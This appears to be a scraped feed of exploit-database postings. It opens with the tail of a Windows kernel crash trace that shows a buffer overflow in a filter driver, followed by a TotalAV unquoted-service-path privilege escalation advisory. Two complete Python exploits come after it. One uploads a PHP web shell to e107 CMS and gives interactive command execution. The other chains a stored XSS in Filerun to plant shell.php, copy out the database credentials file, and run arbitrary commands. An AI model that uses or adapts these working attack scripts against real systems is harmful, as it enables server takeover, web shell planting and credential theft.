ffff07f8`c943e8bd nt!KeBugCheckEx+0x107 fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7 fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297 fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186 fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125 fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320 fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377 fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76 fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500 fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233 fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0

Thursday at 04:57 PM4 days

# Exploit Title: TotalAV 5.15.69 - Unquoted Service Path # Date: 22/09/2021 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.totalav.com # Software Link: https://download.totalav.com/windows/beta-trial or https://install.protected.net/windows/cdn3/5.15.69/TotalAV.exe # Version: 5.15.69 # Tested on: Windows 10 Pro 20H2 and 21H1 x64 The PC Security Management Service, PC Security Management Monitoring Service, and Anti-Malware SDK Protected Service services from TotalAV version 5.15.69 are affected by unquoted service path (CWE-428) vulnerability which may allow a user to gain SYSTEM privileges since they all running with higher privileges. To exploit the vulnerability is possible to place executable(s) following the path of the unquoted string. Affected excecutables services: SecurityService, SecurityServiceMonitor, AMSProtectedService: PC Security Management Service SecurityService C:\Program Files (x86)\TotalAV\SecurityService.exe Auto PC Security Management Monitoring Service SecurityServiceMonitor C:\Program Files (x86)\TotalAV\SecurityService.exe --monitor Auto Anti-Malware SDK Protected Service AMSProtectedService C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe Auto C:\Users\user>sc qc SecurityService [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SecurityService TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : PC Security Management Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc SecurityServiceMonitor [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SecurityServiceMonitor TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : PC Security Management Monitoring Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc AMSProtectedService [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: AMSProtectedService TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Anti-Malware SDK Protected Service DIPENDENZE : SERVICE_START_NAME : LocalSystem

Thursday at 04:57 PM4 days

# Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated) # Date: 21-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 2.3.0 # Category: Webapps # Tested on: Linux/Windows # e107 is a free website content management system # Includes an endpoint that allows remote access # Theme page is misconfigured, causing security vulnerability # User information with sufficient permissions is required. # The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures! # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser( description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)' ) parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!") sleep(2) exit(1) else: check(args) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def check(args): response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami") if response.status_code == 200: print("[*] Exploit File Exists!\n") sleep(2) exploit(args) else: login(args) def login(args): url = args.host + "/e107_admin/admin.php" headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/admin.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"} response = requests.post(url, headers=headers, data=data, allow_redirects=False) new_cookie = response.cookies.get("MySi_cookieSID") if (response.headers.get("Location") == "admin.php?failed"): print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) exit(1) else: print("[+] Success Login...\n") sleep(2) install(args, new_cookie) def install(args, new_cookie): url = args.host + "/e107_admin/theme.php" cookies = { "MySi_cookieSID": new_cookie, "e107_tzOffset": "-180"} headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n" response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) if (response.status_code == 301): print("[!] Unauthorized user!\n\n") print("Requires user with add theme permissions.") sleep(2) exit(1) else: print("[!] Upload Vuln File!\n") sleep(2) exploit(args) def exploit(args): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()

Thursday at 04:57 PM4 days

# Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated) # Date: 09/21/2021 # Exploit Author: syntegris information solutions GmbH # Credits: Christian P. # Vendor Homepage: https://filerun.com # Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t # Version: 2021.03.26 # Tested on: official docker image # PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution import requests import time import sys # this is the plain version of the payload below """ var xmlhttp = new XMLHttpRequest(); var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick' var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #"; xmlhttp.onreadystatechange = function() { if (xmlhttp.readyState == XMLHttpRequest.DONE) { if (xmlhttp.status == 200) { console.log(xmlhttp.responseText); } } }; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send("mode=exec&path=convert|"+payload); """ if not len(sys.argv) == 2: print("missing target url") sys.exit(1) target = sys.argv[1] def inject_code(): payload = "var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>'  > shell.php #";

xmlhttp.onreadystatechange = function() {
	if (xmlhttp.readyState == XMLHttpRequest.DONE) {
	   if (xmlhttp.status == 200) {
		   console.log(xmlhttp.responseText);
	   }
	   else if (xmlhttp.status == 400) {
		  alert('There was an error 400');
	   }
	   else {
		   alert('something else other than 200 was returned');
	   }
	}
};

xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
" req = requests.post( "%s/?module=fileman&page=login&action=login" % target, data={'username': 'nonexistend', 'password': 'wrong', 'otp':'', 'two_step_secret':'','language':''}, headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload} ) def check_shell_exists(): req = requests.get("%s/shell.php" % target) if req.status_code != 200: return False return True def process_command(command): req = requests.get("%s/shell.php?cmd=%s" % (target, command)) print(req.text) while True: print("Injecting new log message...") inject_code() time.sleep(10) if check_shell_exists(): print("Shell exists under '%s/shell.php?cmd=ls'" % target) break print("Lets get autoconfig.php which contains database credentials...") process_command("cp system/data/autoconfig.php js/autoconfig.txt") ac_resp = requests.get("%s/js/autoconfig.txt" % target) with open("filerun.autoconfig.php", "wb") as ac_f: ac_f.write(ac_resp.content) process_command("rm js/autoconfig.php") while True: command = input("Command:") process_command(command)

Thursday at 04:57 PM4 days

